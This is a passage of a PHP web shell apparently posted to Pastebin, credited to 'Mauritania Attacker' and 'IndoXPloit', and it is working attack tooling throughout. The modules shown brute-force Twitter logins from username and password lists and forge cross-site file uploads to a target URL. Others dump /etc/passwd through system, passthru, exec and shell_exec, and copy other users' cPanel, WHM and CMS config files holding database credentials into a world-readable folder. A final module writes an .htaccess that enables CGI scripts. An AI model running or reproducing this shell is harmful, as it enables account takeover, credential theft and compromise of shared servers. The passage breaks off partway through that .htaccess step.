  590. if($_POST['username'] and $_POST['password']){
  591. #function
  592. function brute($user,$pass)
  593. {
  594. $ch = curl_init();
  595. curl_setopt($ch, CURLOPT_URL, "https://twitter.com/intent/session/");
  596. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  597. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  598. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  599. curl_setopt($ch, CURLOPT_POSTFIELDS, "authenticity_token=&session[username_or_email]={$user}&session[password]={$pass}&remember_me=1");
  600. curl_setopt($ch, CURLOPT_USERAGENT, "Chrome/34.0.1847.116"); #change with your real useragent plz
  601.  
  602. # cURL - Brute Users & Password
  603. $login = curl_exec($ch);
  604. if(eregi("error notice", $login)){
  605.  
  606.  
  607. echo "<p align='center' dir='ltr'><font face='Tahoma' size='2'>[+] : Username : <font color='red'>$user</font>&nbsp; Incorrect Password =====>: <font color='red'>$pass</font></font></p>";
  608. }else{
  609. echo "<p align='center' dir='ltr'><font face='Tahoma' size='2'>[+] : [+] CRACKED SUCCESSFULLY [+]Username : <font color='green'>$user</font>&nbsp; GOOD PASSWORD =====>: <font color='green'>$pass</font></font></p>";
  610. }
  611. }
  612. # POSTS
  613. $username = explode("n", $_POST['username']);
  614. $password = explode("n", $_POST['password']);
  615.  
  616. # Foreach Users N' Textarea
  617. foreach($username as $users) {
  618. $users = @trim($users);
  619. foreach($password as $pass) {
  620. $pass = @trim($pass);
  621. brute($users,$pass); }}
  622. # cURL
  623.  
  624. }
  625. echo "<p align='center' dir='ltr'><font size='2'>Coded By : Mauritania Attacker, &amp; Recoded by Rinto AR</font></p>";
  626.  
  627. } elseif($_GET['do'] == 'csrfup')
  628. {
  629. echo '<html>
  630. <center><h1 style="font-size:33px;">CSRF Exploiter By IndoXPloit<br>Recoded by Rinto AR</h1><br><br>
  631. <font size="3">*Note : Post File, Type : Filedata / dzupload / dzfile / dzfiles / file / ajaxfup / files[] / qqfile / userfile / etc</font>
  632. <br><br>
  633. <form method="post" style="font-size:25px;">
  634. URL: <input type="text" name="url" size="50" height="10" placeholder="http://www.target.com/path/upload.php" style="margin: 5px auto; padding-left: 5px;" required><br>
  635. POST File: <input type="text" name="pf" size="50" height="10" placeholder="Lihat diatas ^" style="margin: 5px auto; padding-left: 5px;" required><br>
  636. <input type="submit" name="d" value="Lock!">
  637. </form>';
  638. $url = $_POST["url"];
  639. $pf = $_POST["pf"];
  640. $d = $_POST["d"];
  641. if($d) {
  642. echo "<form method='post' target='_blank' action='$url' enctype='multipart/form-data'><input type='file' name='$pf'><input type='submit' name='g' value='Upload'></form></form>
  643. </html>";
  644. }
  645.  
  646. }
  647.  
  648. elseif($_GET['do'] == 'configv2') {
  649. if($_POST){
  650. $passwd = $_POST['passwd'];
  651. mkdir("noname_config", 0777);
  652. $isi_htc = "Options all\nRequire None\nSatisfy Any";
  653. $htc = fopen("noname_config/.htaccess","w");
  654. fwrite($htc, $isi_htc);
  655. preg_match_all('/(.*?):x:/', $passwd, $user_config);
  656. foreach($user_config[1] as $user_noname) {
  657. $user_config_dir = "/home/$user_noname/public_html/";
  658. if(is_readable($user_config_dir)) {
  659. $grab_config = array(
  660. "/home/$user_noname/.my.cnf" => "cpanel",
  661. "/home/$user_noname/.accesshash" => "WHM-accesshash",
  662. "/home/$user_noname/public_html/bw-configs/config.ini" => "BosWeb",
  663. "/home/$user_noname/public_html/config/koneksi.php" => "Lokomedia",
  664. "/home/$user_noname/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
  665. "/home/$user_noname/public_html/clientarea/configuration.php" => "WHMCS",
  666. "/home/$user_noname/public_html/whm/configuration.php" => "WHMCS",
  667. "/home/$user_noname/public_html/whmcs/configuration.php" => "WHMCS",
  668. "/home/$user_noname/public_html/forum/config.php" => "phpBB",
  669. "/home/$user_noname/public_html/sites/default/settings.php" => "Drupal",
  670. "/home/$user_noname/public_html/config/settings.inc.php" => "PrestaShop",
  671. "/home/$user_noname/public_html/app/etc/local.xml" => "Magento",
  672. "/home/$user_noname/public_html/joomla/configuration.php" => "Joomla",
  673. "/home/$user_noname/public_html/configuration.php" => "Joomla",
  674. "/home/$user_noname/public_html/wp/wp-config.php" => "WordPress",
  675. "/home/$user_noname/public_html/wordpress/wp-config.php" => "WordPress",
  676. "/home/$user_noname/public_html/wp-config.php" => "WordPress",
  677. "/home/$user_noname/public_html/admin/config.php" => "OpenCart",
  678. "/home/$user_noname/public_html/slconfig.php" => "Sitelok",
  679. "/home/$user_noname/public_html/application/config/database.php" => "Ellislab",
  680. "/home1/$user_noname/.my.cnf" => "cpanel",
  681. "/home1/$user_noname/.accesshash" => "WHM-accesshash",
  682. "/home1/$user_noname/public_html/bw-configs/config.ini" => "BosWeb",
  683. "/home1/$user_noname/public_html/config/koneksi.php" => "Lokomedia",
  684. "/home1/$user_noname/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
  685. "/home1/$user_noname/public_html/clientarea/configuration.php" => "WHMCS",
  686. "/home1/$user_noname/public_html/whm/configuration.php" => "WHMCS",
  687. "/home1/$user_noname/public_html/whmcs/configuration.php" => "WHMCS",
  688. "/home1/$user_noname/public_html/forum/config.php" => "phpBB",
  689. "/home1/$user_noname/public_html/sites/default/settings.php" => "Drupal", "/home1/$user_noname/public_html/config/settings.inc.php" => "PrestaShop",
  690. "/home1/$user_noname/public_html/app/etc/local.xml" => "Magento",
  691. "/home1/$user_noname/public_html/joomla/configuration.php" => "Joomla",
  692. "/home1/$user_noname/public_html/configuration.php" => "Joomla",
  693. "/home1/$user_noname/public_html/wp/wp-config.php" => "WordPress",
  694. "/home1/$user_noname/public_html/wordpress/wp-config.php" => "WordPress",
  695. "/home1/$user_noname/public_html/wp-config.php" => "WordPress",
  696. "/home1/$user_noname/public_html/admin/config.php" => "OpenCart",
  697. "/home1/$user_noname/public_html/slconfig.php" => "Sitelok",
  698. "/home1/$user_noname/public_html/application/config/database.php" => "Ellislab",
  699. "/home2/$user_noname/.my.cnf" => "cpanel",
  700. "/home2/$user_noname/.accesshash" => "WHM-accesshash",
  701. "/home2/$user_noname/public_html/bw-configs/config.ini" => "BosWeb",
  702. "/home2/$user_noname/public_html/config/koneksi.php" => "Lokomedia",
  703. "/home2/$user_noname/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
  704. "/home2/$user_noname/public_html/clientarea/configuration.php" => "WHMCS",
  705. "/home2/$user_noname/public_html/whm/configuration.php" => "WHMCS",
  706. "/home2/$user_noname/public_html/whmcs/configuration.php" => "WHMCS",
  707. "/home2/$user_noname/public_html/forum/config.php" => "phpBB",
  708. "/home2/$user_noname/public_html/sites/default/settings.php" => "Drupal",
  709. "/home2/$user_noname/public_html/config/settings.inc.php" => "PrestaShop",
  710. "/home2/$user_noname/public_html/app/etc/local.xml" => "Magento",
  711. "/home2/$user_noname/public_html/joomla/configuration.php" => "Joomla",
  712. "/home2/$user_noname/public_html/configuration.php" => "Joomla",
  713. "/home2/$user_noname/public_html/wp/wp-config.php" => "WordPress",
  714. "/home2/$user_noname/public_html/wordpress/wp-config.php" => "WordPress",
  715. "/home2/$user_noname/public_html/wp-config.php" => "WordPress",
  716. "/home2/$user_noname/public_html/admin/config.php" => "OpenCart",
  717. "/home2/$user_noname/public_html/slconfig.php" => "Sitelok",
  718. "/home2/$user_noname/public_html/application/config/database.php" => "Ellislab",
  719. "/home3/$user_noname/.my.cnf" => "cpanel",
  720. "/home3/$user_noname/.accesshash" => "WHM-accesshash",
  721. "/home3/$user_noname/public_html/bw-configs/config.ini" => "BosWeb",
  722. "/home3/$user_noname/public_html/config/koneksi.php" => "Lokomedia",
  723. "/home3/$user_noname/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
  724. "/home3/$user_noname/public_html/clientarea/configuration.php" => "WHMCS",
  725. "/home3/$user_noname/public_html/whm/configuration.php" => "WHMCS",
  726. "/home3/$user_noname/public_html/whmcs/configuration.php" => "WHMCS",
  727. "/home3/$user_noname/public_html/forum/config.php" => "phpBB",
  728. "/home3/$user_noname/public_html/sites/default/settings.php" => "Drupal",
  729. "/home3/$user_noname/public_html/config/settings.inc.php" => "PrestaShop",
  730. "/home3/$user_noname/public_html/app/etc/local.xml" => "Magento",
  731. "/home3/$user_noname/public_html/joomla/configuration.php" => "Joomla",
  732. "/home3/$user_noname/public_html/configuration.php" => "Joomla",
  733. "/home3/$user_noname/public_html/wp/wp-config.php" => "WordPress",
  734. "/home3/$user_noname/public_html/wordpress/wp-config.php" => "WordPress",
  735. "/home3/$user_noname/public_html/wp-config.php" => "WordPress",
  736. "/home3/$user_noname/public_html/admin/config.php" => "OpenCart",
  737. "/home3/$user_noname/public_html/slconfig.php" => "Sitelok",
  738. "/home3/$user_noname/public_html/application/config/database.php" => "Ellislab"
  739. );
  740. foreach($grab_config as $config => $nama_config) {
  741. $ambil_config = file_get_contents($config);
  742. if($ambil_config == '') {
  743. } else {
  744. $file_config = fopen("noname_config/$user_noname-$nama_config.txt","w");
  745. fputs($file_config,$ambil_config);
  746. }
  747. }
  748. }
  749. }
  750. echo "<center><a href='?dir=$dir/noname_config'><font color=lime>Done</font></a></center>";
  751. }else{
  752.  
  753. echo "<form method=\"post\" action=\"\"><center>etc/passw ( Error ? <a href='?dir=$dir&do=passwbypass'>Bypass Here</a> )<br><textarea name=\"passwd\" class='area' rows='15' cols='60'>\n";
  754. echo file_get_contents('/etc/passwd');
  755. echo "</textarea><br><input type=\"submit\" value=\"GassPoll\"></td></tr></center>\n";
  756. }
  757. }elseif($_GET['do'] == 'passwbypass') {
  758. echo '<center>Bypass etc/passw With:<br>
  759. <table style="width:50%">
  760. <tr>
  761. <td><form method="post"><input type="submit" value="System Function" name="syst"></form></td>
  762. <td><form method="post"><input type="submit" value="Passthru Function" name="passth"></form></td>
  763. <td><form method="post"><input type="submit" value="Exec Function" name="ex"></form></td>
  764. <td><form method="post"><input type="submit" value="Shell_exec Function" name="shex"></form></td>
  765. <td><form method="post"><input type="submit" value="Posix_getpwuid Function" name="melex"></form></td>
  766. </tr></table>Bypass User With : <table style="width:50%">
  767. <tr>
  768. <td><form method="post"><input type="submit" value="Awk Program" name="awkuser"></form></td>
  769. <td><form method="post"><input type="submit" value="System Function" name="systuser"></form></td>
  770. <td><form method="post"><input type="submit" value="Passthru Function" name="passthuser"></form></td>
  771. <td><form method="post"><input type="submit" value="Exec Function" name="exuser"></form></td>
  772. <td><form method="post"><input type="submit" value="Shell_exec Function" name="shexuser"></form></td>
  773. </tr>
  774. </table><br>';
  775.  
  776.  
  777. if ($_POST['awkuser']) {
  778. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  779. echo shell_exec("awk -F: '{ print $1 }' /etc/passwd | sort");
  780. echo "</textarea><br>";
  781. }
  782. if ($_POST['systuser']) {
  783. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  784. echo system("ls /var/mail");
  785. echo "</textarea><br>";
  786. }
  787. if ($_POST['passthuser']) {
  788. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  789. echo passthru("ls /var/mail");
  790. echo "</textarea><br>";
  791. }
  792. if ($_POST['exuser']) {
  793. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  794. echo exec("ls /var/mail");
  795. echo "</textarea><br>";
  796. }
  797. if ($_POST['shexuser']) {
  798. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  799. echo shell_exec("ls /var/mail");
  800. echo "</textarea><br>";
  801. }
  802. if($_POST['syst'])
  803. {
  804. echo"<textarea class='inputz' cols='65' rows='15'>";
  805. echo system("cat /etc/passwd");
  806. echo"</textarea><br><br><b></b><br>";
  807. }
  808. if($_POST['passth'])
  809. {
  810. echo"<textarea class='inputz' cols='65' rows='15'>";
  811. echo passthru("cat /etc/passwd");
  812. echo"</textarea><br><br><b></b><br>";
  813. }
  814. if($_POST['ex'])
  815. {
  816. echo"<textarea class='inputz' cols='65' rows='15'>";
  817. echo exec("cat /etc/passwd");
  818. echo"</textarea><br><br><b></b><br>";
  819. }
  820. if($_POST['shex'])
  821. {
  822. echo"<textarea class='inputz' cols='65' rows='15'>";
  823. echo shell_exec("cat /etc/passwd");
  824. echo"</textarea><br><br><b></b><br>";
  825. }
  826. echo '<center>';
  827. if($_POST['melex'])
  828. {
  829. echo"<textarea class='inputz' cols='65' rows='15'>";
  830. for($uid=0;$uid<60000;$uid++){
  831. $ara = posix_getpwuid($uid);
  832. if (!empty($ara)) {
  833. while (list ($key, $val) = each($ara)){
  834. print "$val:";
  835. }
  836. print "\n";
  837. }
  838. }
  839. echo"</textarea><br><br>";
  840. }
  841. } elseif(isset($_GET['do']) && ($_GET['do'] == 'multiconfig'))
  842. { @ini_set('output_buffering',0);
  843. ?>
  844. <form action="?y=<?php echo $pwd; ?>&amp;do=multiconfig" method="post">
  845. <br><br><center><b><font size=4>[ Multi Config Fucker ]</font></b></center>
  846. <form method=post><br><center><table class='tabnet'>
  847. <tr><th><b>Php Config</b></th><th><b>Perl Config</b></th><th><b>Litespeed Config Fucker</b></th><th><b>Config Fucker .ini Method</b></th></tr>
  848. <tr><td><input class='inputzbut' type='submit'name='phpconfig' value="Php Config" /></td><td>
  849. <input class='inputzbut' type='submit' name='perlconfig' value="Perl Config" /></td><td>
  850. <input class='inputzbut' type='submit' name='lcf' value="Litespeed Config Fucker" /></td><td>
  851. <input class='inputzbut' type='submit' name='configini' value="Config Fucker .ini Method" /></td><tr></table>
  852. </center></form><br><hr><br><br>
  853. <?php
  854. @ini_set('html_errors',0);
  855. @ini_set('max_execution_time',0);
  856. @ini_set('output_buffering',0);
  857. @ini_set('display_errors', 0);
  858. @set_time_limit(0);
  859.  
  860. if(isset($_POST['configini']))
  861. { echo "<center/><b><font color=>[ Config .ini Method ]</font></b><br><br>";
  862.  
  863. mkdir('multi_config', 0755);
  864. chdir('multi_config');
  865. $kokdosya = ".htaccess";
  866. $dosya_adi = "$kokdosya";
  867. $dosya = fopen ($dosya_adi , 'w') or die ("Error!");
  868. $metin = "Options FollowSymLinks MultiViews Indexes ExecCGI \n AddType application/x-httpd-cgi .pl \n AddHandler cgi-script .pl \n AddHandler cgi-script .pl";
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!